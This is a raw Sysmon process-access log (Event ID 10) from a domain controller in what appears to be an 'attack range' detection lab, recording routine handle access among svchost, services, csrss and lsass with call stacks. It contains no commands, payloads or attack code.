10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.807{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.807{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.807{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.807{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.807{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF7-5F80-0A00-000000007F01}8521112C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.792{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.776{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.776{733EE690-3DF7-5F80-0A00-000000007F01}852936C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.776{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.776{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.776{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.761{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.761{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.761{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.761{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.761{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 